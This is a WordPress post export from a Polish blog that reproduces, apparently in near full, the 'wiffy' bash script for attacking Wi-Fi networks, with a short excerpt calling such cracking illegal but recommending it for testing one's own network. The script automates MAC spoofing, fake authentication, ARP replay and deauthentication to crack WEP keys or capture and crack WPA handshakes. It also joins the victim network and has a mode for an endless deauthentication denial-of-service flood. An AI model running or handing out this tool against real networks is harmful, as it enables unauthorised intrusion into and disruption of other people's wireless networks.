>> $logFile ;\n return 1\n fi\n}\nfunction display() { # display type message $diagnostics\n error=\"free\"\n if [ -z \"$1\" ] || [ -z \"$2\" ] ; then error=\"1\" ; fi # Coding error\n if [ \"$1\" != \"action\" ] && [ \"$1\" != \"info\" ] && [ \"$1\" != \"diag\" ] && [ \"$1\" != \"error\" ] ; then error=\"5\"; fi # Coding error\n if [ \"$error\" == \"free\" ] ; then\n output=\"\"\n if [ \"$1\" == \"action\" ] ; then output=\"\\e[01;32m[>]\\e[00m\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"\\e[01;33m[i]\\e[00m\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"\\e[01;34m[+]\\e[00m\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"\\e[01;31m[-]\\e[00m\" ; fi\n output=\"$output $2\"\n echo -e \"$output\"\n if [ \"$3\" == \"true\" ] ; then\n if [ \"$1\" == \"action\" ] ; then output=\"[>]\" ; fi\n if [ \"$1\" == \"info\" ] ; then output=\"[i]\" ; fi\n if [ \"$1\" == \"diag\" ] ; then output=\"[+]\" ; fi\n if [ \"$1\" == \"error\" ] ; then output=\"[-]\" ; fi\n echo -e \"---------------------------------------------------------------------------------------------\\n$output $2\" >> $logFile\n fi\n return 0\n else\n display error \"display. Error code: $error\" $logFile 1>&2\n echo -e \"---------------------------------------------------------------------------------------------\\n-->ERROR: display (Error code: $error): $1 , $2 , $3 \" >> $logFile ;\n return 1\n fi\n}\n\n\n#----------------------------------------------------------------------------------------------#\necho -e \"\\e[01;36m[*]\\e[00m wiffy v$version\"\n\n#----------------------------------------------------------------------------------------------#\nwhile getopts \"i:t:m:e:b:c:w:z:s:xdvVu?\" OPTIONS; do\n case ${OPTIONS} in\n i ) interface=$OPTARG;;\n t ) monitorInterface=$OPTARG;;\n m ) mode=$OPTARG;;\n e ) essid=$OPTARG;;\n b ) bssid=$OPTARG;;\n c ) client=$OPTARG;;\n w ) wordlist=$OPTARG;;\n z ) macMode=$OPTARG;;\n s ) fakeMac=$OPTARG;;\n x ) extras=\"true\";;\n d ) diagnostics=\"true\";;\n v ) verbose=\"1\";;\n V ) verbose=\"2\";;\n u ) update;;\n ? ) help;;\n * ) display error \"Unknown option.\" $diagnostics 1>&2 ;; # Default\n esac\ndone\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$debug\" == \"true\" ] ; then\n display info \"Debug mode\" $diagnostics\nfi\nif [ \"$diagnostics\" == \"true\" ] ; then\n display diag \"Diagnostics mode\" $diagnostics\n echo -e \"wiffy v$version\\n$(date)\" > $logFile\n echo \"wiffy.sh\" $* >> $logFile\nfi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Analyzing: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$(id -u)\" != \"0\" ] ; then display error \"Not a superuser.\" $diagnostics 1>&2 ; cleanup nonuser; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=\"\"\ntmp=$(ls \/tmp\/wiffy-*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy-*\" ; fi\ntmp=$(ls \/tmp\/wiffy.dump*.netxml 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command \/tmp\/wiffy.dump*\" ; fi\ntmp=$(ls replay_arp*.cap 2> \/dev\/null)\nif [ \"$tmp\" ] ; then command=\"$command replay_arp*.cap\" ; fi\nif [ -e \"\/tmp\/wiffy.key\" ] ; then command=\"$command \/tmp\/wiffy.key\" ; fi\nif [ -e \"\/tmp\/wiffy.tmp\" ] ; then command=\"$command \/tmp\/wiffy.tmp\" ; fi\nif [ -e \"\/tmp\/wiffy.conf\" ] ; then command=\"$command \/tmp\/wiffy.conf\" ; fi\nif [ -e \"\/tmp\/wiffy.handshake\" ] ; then command=\"$command \/tmp\/wiffy.handshake\" ; fi\nif [ ! -z \"$command\" ] ; then action \"Removing old files\" \"rm -rfv $command\" $verbose $diagnostics \"true\" ; fi\n\n#----------------------------------------------------------------------------------------------#\nif [ -z \"$interface\" ] ; then display error \"interface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$monitorInterface\" ] ; then display error \"monitorInterface can't be blank\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$mode\" != \"crack\" ] && [ \"$mode\" != \"dos\" ] ; then display error \"mode ($mode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ ! -e \"$wordlist\" ] ; then display error \"There isn't a wordlist at $wordlist\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" != \"random\" ] && [ \"$macMode\" != \"set\" ] && [ \"$macMode\" != \"false\" ] ; then display error \"macMode ($macMode) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$macMode\" == \"set\" ] ; then if [ -z \"$fakeMac\" ] || [ ! $(echo $fakeMac | egrep \"^([0-9a-fA-F]{2}\\:){5}[0-9a-fA-F]{2}$\") ] ; then display error \"fakeMac ($fakeMac) isn't correct\" $diagnostics 1>&2 ; cleanup; fi ; fi\nif [ \"$mode\" == \"crack\" ] && [ \"$extras\" != \"true\" ] && [ \"$extras\" != \"false\" ] ; then display error \"extras ($extras) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" != \"true\" ] && [ \"$diagnostics\" != \"false\" ] ; then display error \"diagnostics ($diagnostics) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$verbose\" != \"0\" ] && [ \"$verbose\" != \"1\" ] && [ \"$verbose\" != \"2\" ] ; then display error \"verbose ($verbose) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ -z \"$version\" ] ; then display error \"version ($version) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$debug\" != \"true\" ] && [ \"$debug\" != \"false\" ] ; then display error \"debug ($debug) isn't correct\" $diagnostics 1>&2 ; cleanup; fi\nif [ \"$diagnostics\" == \"true\" ] && [ -z \"$logFile\" ] ; then display error \"logFile ($logFile) isn't correct\" $diagnostics 1>&2 ; cleanup ; fi\n\n#----------------------------------------------------------------------------------------------#\ncommand=$(iwconfig $interface 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1)\nif [ ! $command ]; then\n display error \"$interface isn't a wireless interface.\" $diagnostics\n display info \"Searching for a wireless interface\" $diagnostics\n command=$(iwconfig 2>\/dev\/null | grep \"802.11\" | cut -d\" \" -f1) #| awk '!\/\"'\"$interface\"'\"\/'\n if [ $command ] ; then\n interface=$command\n display info \"Found $interface\" $diagnostics\n else\n display error \"Couldn't find a wireless interface.\" $diagnostics 1>&2\n cleanup\n fi\nfi\n\ncommand=$(ifconfig -a | grep $interface | awk '{print $1}')\nif [ \"$command\" != \"$interface\" ] ; then\n display error \"The wireless interface $interface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\nfi\n\n#----------------------------------------------------------------------------------------------#\nmac=$(macchanger --show $interface | awk -F \" \" '{print $3}')\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Stopping: Programs\" $diagnostics ; fi\ncommand=$(ps aux | grep $interface | awk '!\/grep\/ && !\/awk\/ && !\/wiffy\/ {print $2}' | while read line; do echo -n \"$line \"; done | awk '{print}')\nif [ -n \"$command\" ] ; then\n action \"Killing programs\" \"kill $command\" $verbose $diagnostics \"true\" # to prevent interference\nfi\naction \"Killing 'Programs'\" \"killall wicd-client airodump-ng xterm\" $verbose $diagnostics \"true\" # Killing \"wicd-client\" to prevent channel hopping\naction \"Killing 'wicd service'\" \"\/etc\/init.d\/wicd stop\" $verbose $diagnostics \"true\" # Stopping wicd to prevent channel hopping\n\n#----------------------------------------------------------------------------------------------#\naction \"Refreshing interface\" \"ifconfig $interface down && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\"\nloopMain=\"false\"\nwhile [ \"$loopMain\" != \"true\" ] ; do\n findAP\n if [ \"$id\" ] ; then\n loopMain=\"true\"\n else\n if [ \"$essid\" ] ; then display error \"Couldnt find essid ($essid)\" $diagnostics 1>&2 ; fi\n if [ \"$bssid\" ] ; then display error \"Couldnt find bssid ($bssid)\" $diagnostics 1>&2 ; fi\n loop=${#arrayBSSID[@]}\n echo -e \" Num | ESSID | BSSID | Protected | Cha | Quality\\n-----|------------------------|-------------------|-----------|-----|---------\"\n for (( i=0;i<$loop;i++)); do\n printf ' %-2s | %-22s | %-16s | %3s (%-3s) | %-3s| %-6s\\n' \"$(($i+1))\" \"${arrayESSID[${i}]}\" \"${arrayBSSID[${i}]}\" \"${arrayProtected[${i}]}\" \"${arrayEncryption[${i}]}\" \"${arrayChannel[${i}]}\" \"${arrayQuality[${i}]}\"\n done\n loopSub=\"false\"\n while [ \"$loopSub\" != \"true\" ] ; do\n read -p \"[~] re[s]can, re[f]resh, e[x]it or select num: \"\n if [ \"$REPLY\" == \"x\" ] ; then cleanup clean\n elif [ \"$REPLY\" == \"s\" ] ; then loopSub=\"true\" # aka do nothing\n elif [ \"$REPLY\" == \"f\" ] ; then action \"Refreshing interface\" \"ifconfig $interface down && sleep 1 && ifconfig $interface up && sleep 1\" $verbose $diagnostics \"true\" && loopSub=\"true\" # aka do nothing\n elif [ -z $(echo \"$REPLY\" | tr -dc '[:digit:]'l) ] ; then display error \"Bad input, $REPLY\" $diagnostics 1>&2\n elif [ \"$REPLY\" -lt 1 ] || [ \"$REPLY\" -gt $loop ] ; then display error \"Incorrect number, $REPLY\" $diagnostics 1>&2\n else id=\"$(($REPLY-1))\" ; loopSub=\"true\" ; loopMain=\"true\"\n fi\n done\n fi\ndone\nessid=\"${arrayESSID[$id]}\"\nbssid=\"${arrayBSSID[$id]}\"\nchannel=\"${arrayChannel[$id]}\"\nencryption=\"${arrayEncryption[$id]}\"\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then\n echo \"-Settings------------------------------------------------------------------------------------\n interface=$interface\n monitorInterface=$monitorInterface\n mode=$mode\n essid=$essid\n bssid=$bssid\n encryption=$encryption\n channel=$channel\n client=$client\n wordlist=$wordlist\n mac=$mac\n macMode=$macMode\n fakeMac=$fakeMac\n diagnostics=$diagnostics\n verbose=$verbose\n debug=$debug\n-Environment---------------------------------------------------------------------------------\" >> $logFile\n display diag \"Detecting: Kernal\" $diagnostics\n uname -a >> $logFile\n display diag \"Detecting: Hardware\" $diagnostics\n lspci -knn >> $logFile\nfi\nif [ \"$debug\" == \"true\" ] || [ \"$verbose\" != \"0\" ] ; then\n display info \" interface=$interface\n\\e[01;33m[i]\\e[00m monitorInterface=$monitorInterface\n\\e[01;33m[i]\\e[00m mode=$mode\n\\e[01;33m[i]\\e[00m essid=$essid\n\\e[01;33m[i]\\e[00m bssid=$bssid\n\\e[01;33m[i]\\e[00m encryption=$encryption\n\\e[01;33m[i]\\e[00m channel=$channel\n\\e[01;33m[i]\\e[00m client=$client\n\\e[01;33m[i]\\e[00m wordlist=$wordlist\n\\e[01;33m[i]\\e[00m mac=$mac\n\\e[01;33m[i]\\e[00m macMode=$macMode\n\\e[01;33m[i]\\e[00m fakeMac=$fakeMac\n\\e[01;33m[i]\\e[00m diagnostics=$diagnostics\n\\e[01;33m[i]\\e[00m verbose=$verbose\n\\e[01;33m[i]\\e[00m debug=$debug\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"aircrack-ng isn't installed.\" $diagnostics 1>&2\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install aircrack-ng\" \"apt-get -y install aircrack-ng\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/sbin\/airmon-ng\" ] && [ ! -e \"\/usr\/local\/sbin\/airmon-ng\" ] ; then\n display error \"Failed to install aircrack-ng\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed aircrack-ng\" $diagnostics\n fi\nfi\nif [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"macchanger isn't installed.\" $diagnostics\n read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install macchanger\" \"apt-get -y install macchanger\" $verbose $diagnostics \"true\" ; fi\n if [ ! -e \"\/usr\/bin\/macchanger\" ] ; then\n display error \"Failed to install macchanger\" $diagnostics 1>&2 ; cleanup\n else\n display info \"Installed macchanger\" $diagnostics\n fi\nfi\n#if [ \"$attack\" == \"inject\" ] ; then\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"airpwn isn't installed.\" $diagnostics\n# read -p \"[~] Would you like to try and install it? [Y\/n]: \" -n 1\n# if [[ $REPLY =~ ^[Yy]$ ]] ; then action \"Install airpwn\" \"apt-get -y install libnet1-dev libpcap-dev python2.4-dev libpcre3-dev libssl-dev\" $verbose $diagnostics \"true\" ; fi\n# action \"Install airpwn\" \"wget -P \/tmp http:\/\/downloads.sourceforge.net\/project\/airpwn\/airpwn\/1.4\/airpwn-1.4.tgz && tar -C \/pentest\/wireless -xvf \/tmp\/airpwn-1.4.tgz && rm \/tmp\/airpwn-1.4.tgz\" $verbose $diagnostics \"true\"\n# find=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h\" > \"\/usr\/include\/linux\/wireless.h.new\"\n# find=\"#ifndef _LINUX_WIRELESS_H\"\n# replace=\"#include \\n#ifndef _LINUX_WIRELESS_H\"\n# sed \"s\/$find\/$replace\/g\" \"\/usr\/include\/linux\/wireless.h.new\" > \"\/usr\/include\/linux\/wireless.h\"\n# rm -f \"\/usr\/include\/linux\/wireless.h.new\"\n# action \"Install airpwn\" \"command=$(pwd) && tar -C \/pentest\/wireless\/airpwn-1.4 -xvf \/pentest\/wireless\/airpwn-1.4\/lorcon-current.tgz && cd \/pentest\/wireless\/airpwn-1.4\/lorcon && .\/configure && make && make install && cd $command\" $verbose $diagnostics \"true\"\n# action \"Install airpwn\" \"command=$(pwd) && cd \/pentest\/wireless\/airpwn-1.4 && .\/configure && make && cd $command\" $verbose $diagnostics \"true\"\n# if [ ! -e \"\/pentest\/wireless\/airpwn-1.4\/airpwn\" ] ; then\n# display error \"Failed to install airpwn\" $diagnostics 1>&2 ; cleanup\n# else\n# display info \"Installed airpwn\" $diagnostics\n# fi\n# fi\n#fi\n\n#----------------------------------------------------------------------------------------------#\ndisplay action \"Configuring: Environment\" $diagnostics\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: Wireless card\" $diagnostics ; fi\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" == \"$monitorInterface\" ] ; then\n action \"Monitor Mode (Stopping)\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\nfi\n\naction \"Monitor Mode (Starting)\" \"airmon-ng start $interface | awk '\/monitor mode enabled on\/ {print \\$5}' | tr -d '\\011' | sed -e \\\"s\/(monitor mode enabled on \/\/\\\" | sed 's\/\\(.*\\).\/\\1\/' > \/tmp\/wiffy.tmp\" $verbose $diagnostics \"true\"\ncommand=$(cat \/tmp\/wiffy.tmp)\nif [ \"$monitorInterface\" != \"$command\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display info \"Configuring: Chaning monitorInterface to: $command\" $diagnostics\n fi\n monitorInterface=$command\nfi\n\ncommand=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\nif [ \"$command\" != \"$monitorInterface\" ] ; then\n sleep 5 # Some people need to wait a little bit longer (e.g. VM), some don't. Don't force the ones that don't need it!\n command=$(ifconfig -a | grep $monitorInterface | awk '{print $1}')\n if [ \"$command\" != \"$monitorInterface\" ] ; then\n display error \"The monitor interface $monitorInterface, isn't correct.\" $diagnostics 1>&2\n if [ \"$debug\" == \"true\" ] ; then iwconfig; fi\n cleanup\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n display diag \"Testing: Wireless Injection\" $diagnostics\n command=$(aireplay-ng --test $monitorInterface -i $monitorInterface)\n if [ \"$diagnostics\" == \"true\" ] ; then echo -e $command >> $logFile ; fi\n if [ -z \"$(echo \\\"$command\\\" | grep 'Injection is working')\" ] ; then display error \"$monitorInterface doesn't support packet injecting.\" $diagnostics 1>&2\n elif [ -z \"$(echo \\\"$command\\\" | grep 'Found 0 APs')\" ] ; then display error \"Couldn't test packet injection\" $diagnostics 1>&2 ;\n fi\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$macMode\" != \"false\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Configuring: MAC address\" $diagnostics ; fi\n command=\"ifconfig $monitorInterface down &&\"\n if [ \"$macMode\" == \"random\" ] ; then command=\"$command macchanger -A $monitorInterface &&\"; fi\n if [ \"$macMode\" == \"set\" ] ; then command=\"$command macchanger -m $fakeMac $monitorInterface &&\"; fi\n command=\"$command ifconfig $monitorInterface up\"\n action \"Configuring: MAC address\" \"$command\" $verbose $diagnostics \"true\"\n sleep 2\n mac=\"$fakeMac\"\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$mode\" == \"crack\" ] ; then\n if [ -z \"$client\" ] ; then\n display action \"Detecting: Client(s)\" $diagnostics\n findClient $encryption\n fi\n\n #----------------------------------------------------------------------------------------------#\n display action \"Starting: airodump-ng\" $diagnostics\n action \"Removing temp files\" \"rm -f \/tmp\/wiffy* && sleep 1\" $verbose $diagnostics \"true\"\n action \"airodump-ng\" \"airodump-ng --bssid $bssid --channel $channel --write \/tmp\/wiffy --output-format cap $monitorInterface\" $verbose $diagnostics \"true\" \"0|0|13\" & # Don't wait, do the next command\n sleep 1\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] ; then\n if [ \"$client\" == \"clientless\" ] ; then\n display action \"Attack (FakeAuth): $fakeMac\" $diagnostics\n action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $mac $monitorInterface\" $verbose $diagnostics \"true\"\n #action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 30 -o 1 -q 10 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n #if [Association successful] = then\n client=$mac\n sleep 1\n fi\n display action \"Attack (ARPReplay+Deauth): $client\" $diagnostics\n action \"aireplay-ng (arpreplay)\" \"aireplay-ng --arpreplay -e \\\"$essid\\\" -b $bssid -h $client $monitorInterface\" $verbose $diagnostics \"true\" \"0|195|10\" & # Don't wait, do the next command\n sleep 1\n action \"aireplay-ng (deauth)\" \"aireplay-ng --deauth 5 -e \\\"$essid\\\" -a $bssid -c $fakeMac $monitorInterface\" $verbose $diagnostics \"true\"\n sleep 1\n if [ \"$client\" == \"$mac\" ] ; then sleep 20 && action \"aireplay-ng (fakeauth)\" \"aireplay-ng --fakeauth 0 -e \\\"$essid\\\" -a $bssid -h $fakeMac $monitorInterface\" $verbose $diagnostics \"true\" ; fi\n sleep 60\n\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Capturing: Handshake\" $diagnostics\n loop=\"0\" # 0 = first, 1 = client, 2 = everyone\n echo \"g0tmi1k\" > \/tmp\/wiffy.tmp\n for (( ; ; )) ; do\n action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w \/tmp\/wiffy.tmp -e \\\"$essid\\\" > \/tmp\/wiffy.handshake\" $verbose $diagnostics \"true\"\n command=$(cat \/tmp\/wiffy.handshake | grep \"Passphrase not in dictionary\" ) #Got no data packets from client network & No valid WPA handshakes found\n if [ \"$command\" ] ; then break; fi\n sleep 2\n if [ \"$loop\" != \"1\" ] ; then\n if [ \"$loop\" != \"0\" ] ; then findClient $encryption ; fi\n sleep 1\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): $client\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid -c $client mon0\" $verbose $diagnostics \"true\"\n loop=\"1\"\n else\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Deauth): *everyone*\" $diagnostics ; fi\n action \"aireplay-ng\" \"aireplay-ng --deauth 5 -a $bssid mon0\" $verbose $diagnostics \"true\"\n loop=\"2\"\n fi\n sleep 1\n done\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Captured: Handshake\" $diagnostics ; fi\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n fi\n\n #----------------------------------------------------------------------------------------------#\n if [ \"$encryption\" == \"WEP\" ] || [ \"$encryption\" == \"WPA\" ] ; then\n display action \"Starting: aircrack-ng\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|350|30\" ; fi\n if [ \"$encryption\" == \"WPA\" ] ; then action \"aircrack-ng\" \"aircrack-ng \/tmp\/wiffy*.cap -w $wordlist -e \\\"$essid\\\" -l \/tmp\/wiffy.key\" $verbose $diagnostics \"false\" \"0|0|20\" ; fi\n fi\n\n #----------------------------------------------------------------------------------------------#\n action \"Killing programs\" \"killall xterm && sleep 1\" $verbose $diagnostics \"true\"\n action \"airmon-ng\" \"airmon-ng stop $monitorInterface\" $verbose $diagnostics \"true\"\n\n #----------------------------------------------------------------------------------------------#\n if [ -e \"\/tmp\/wiffy.key\" ] ; then\n key=$(cat \/tmp\/wiffy.key)\n display info \"WiFi key: $key\" $diagnostics\n #----------------------------------------------------------------------------------------------#\n if [ \"$extras\" == \"true\" ] ; then\n if [ \"$client\" != \"$mac\" ] ; then\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then display action \"Attack (Spoofing): $client ('Helps' with MAC filtering) \" $diagnostics ; fi\n action \"airmon-ng\" \"ifconfig $interface down && macchanger -m $client $interface && ifconfig $interface up\" $verbose $diagnostics \"true\"\n fi\n display action \"Joining: $essid\" $diagnostics\n if [ \"$encryption\" == \"WEP\" ] ; then\n action \"i[f\/w]config\" \"ifconfig $interface down && iwconfig $interface essid $essid key $key && ifconfig $interface up\" $verbose $diagnostics \"true\"\n elif [ \"$encryption\" == \"WPA\" ] ; then\n action \"wpa_passphrase\" \"wpa_passphrase $essid '$key' > \/tmp\/wiffy.conf\" $verbose $diagnostics \"true\"\n action \"wpa_supplicant\" \"wpa_supplicant -B -i $interface -c \/tmp\/wiffy.conf -D wext\" $verbose $diagnostics \"true\"\n fi\n sleep 5\n action \"dhclient\" \"dhclient $interface\" $verbose $diagnostics \"true\"\n if [ \"$verbose\" != \"0\" ] || [ \"$diagnostics\" == \"true\" ] || [ \"$debug\" == \"true\" ] ; then\n ourIP=$(ifconfig $interface | awk '\/inet addr\/ {split ($2,A,\":\"); print A[2]}')\n display info \"IP: $ourIP\" $diagnostics\n #gateway=$(route -n | grep $interface | awk '\/^0.0.0.0\/ {getline; print $2}')\n #display info \"Gateway: $gateway\" $diagnostics\n fi\n fi\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" == \"WPA\" ] ; then\n display error \"WiFi Key not in wordlist\" $diagnostics 1>&2\n display action \"Moving handshake: $(pwd)\/wiffy-$essid.cap\" $diagnostics 1>&2\n action \"Moving capture\" \"mv -f \/tmp\/wiffy*.cap $(pwd)\/wiffy-$essid.cap\" $verbose $diagnostics \"true\"\n #----------------------------------------------------------------------------------------------#\n elif [ \"$encryption\" != \"N\/A\" ] ; then\n display error \"Something went wrong )=\" $diagnostics 1>&2\n fi\n\n\n#----------------------------------------------------------------------------------------------#\nelif [ \"$mode\" == \"dos\" ] ; then\n display action \"Attack (DOS): $essid\" $diagnostics\n command=\"aireplay-ng --deauth 0 -e \\\"$essid\\\" -a $bssid\"\n if [ \"$client\" != \"clientless\" ] ; then command=\"$command -c $client\" ; fi\n command=\"$command $monitorInterface\"\n action \"aireplay-ng (DeAuth)\" \"$command\" $verbose $diagnostics \"true\" &\n\n #----------------------------------------------------------------------------------------------#\n display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n for (( ; ; )) ; do\n sleep 5\n done\n#elif [ \"$mode\" == \"inject\" ] ; then\n# display action \"Attack (Inject): $essid\" $diagnostics\n# if [ \"$encryption\" != \"WEP\" ] ; then display error \"Only works on WEP networks\" $diagnostics 1>&2 ; cleanup ; fi\n\n #action \"aireplay-ng (Inject)\" \"airtun-ng -a $bssid $monitorInterface\" $verbose $diagnostics \"true\" &\n #action \"aireplay-ng (Inject)\" \"ifconfig at0 192.168.1.83 netmask 255.255.255.0 up\" $verbose $diagnostics \"true\" &\n\n # airmon-ng start wlan0\n # \/pentest\/wireless\/airpwn-1.4\/airpwn -c conf\/greet_html -d rt73 -i mon0 -v\n\n #----------------------------------------------------------------------------------------------#\n# display info \"Attacking! ...press CTRL+C to stop\" $diagnostics\n# if [ \"$diagnostics\" == \"true\" ] ; then echo \"-Ready!----------------------------------\" >> $logFile ; fi\n# for (( ; ; )) ; do\n# sleep 5\n# done\nfi\n\n#----------------------------------------------------------------------------------------------#\nif [ \"$diagnostics\" == \"true\" ] ; then echo \"-Done!---------------------------------------------------------------------------------------\" >> $logFile ; fi\ncleanup clean\n\n\n#---Ideas--------------------------------------------------------------------------------------#\n# WEP - Chopchop\/FagmentationAP Packet Broadcast\n# WPA - aircrack\/coWPAtty\n# WPA - brute \/ hash\n# WPA - calculate hash\n# WPA - use pre hash \/ use pre capture\n# WPA - use folder for wordlist\n# WiFi Key is in hex\n# update - aircrack\/coWPATTY\n# decrypt packets - offline & online (airtun-ng)\n# Mode - Injection - GET WORKING\n# display error \"The encryption ($encryption) on $essid isn't support\" $diagnostics 1>&2 ; cleanup\n<\/pre>\nW przypadku kopiowania powy\u017cszego skryptu nale\u017cy go oczywi\u015bcie zapisa\u0107 w pliku o rozszerzeniu *.sh<\/p>\nDo pobrania<\/a>\n*Oczywi\u015bcie nie moje \u017ar\u00f3de\u0142ko. \ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"Na pocz\u0105tku chcia\u0142bym zaznaczy\u0107 \u017ce takie \u0142amanie zabezpiecze\u0144 jest nielegalne, i czynisz tym z\u0142o. Jednak dla sprawdzenia naszej sieci, pod wzgl\u0119dem „truno\u015bci” z\u0142amania naszego has\u0142a polecam ten skrypt! ]:-> Chcia\u0142bym pokaza\u0107 wam skrypt pewnej osoby zwanej w internecie :\u00a0g0tmi1k Musze powiedzie\u0107 \u017ce \u00a0ch\u0142opak zna si\u0119 na sieciach, i na bashu .. Za pomoc\u0105 tego skryptu […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[236],"class_list":["post-831","post","type-post","status-publish","format-standard","hentry","category-linux","tag-wardriving"],"_links":{"self":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/comments?post=831"}],"version-history":[{"count":0,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/posts\/831\/revisions"}],"wp:attachment":[{"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/media?parent=831"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/categories?post=831"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/dawidsobieraj.pl\/wp-json\/wp\/v2\/tags?post=831"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}](\"https:\/\/dawidsobieraj.pl\/wp-content\/gallery\/mirow-okolice\/mirow-okolice-0005.jpg\"\n){kind=link}
